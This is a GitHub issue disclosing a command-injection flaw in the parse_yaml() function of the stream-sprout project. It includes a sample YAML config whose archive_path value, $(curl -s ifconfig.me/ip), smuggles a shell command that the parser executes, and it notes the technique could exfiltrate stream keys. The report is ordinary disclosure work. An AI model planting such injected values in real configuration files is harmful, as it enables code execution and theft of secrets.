### ISSUE TITLE
sec: arbitrary code execution in parse_yaml()

### ISSUE THREAD

**Issue by flexiondotorg** [wimpysworld/stream-sprout#28]
`parse_yaml()` does not sanitise substitutes, making it possible for the parser to execute arbitrary code. For example, this yaml will execute the `curl` in `archive_path`.

```yaml
server:
  ip: 127.0.0.1
  port: 1935
  app: sprout
  key: winkle
  archive_stream: true
  archive_path: $(curl -s ifconfig.me/ip)
```

This example is not so harmful, but the technique could be used by an attacker to exfiltrate stream keys or worse.
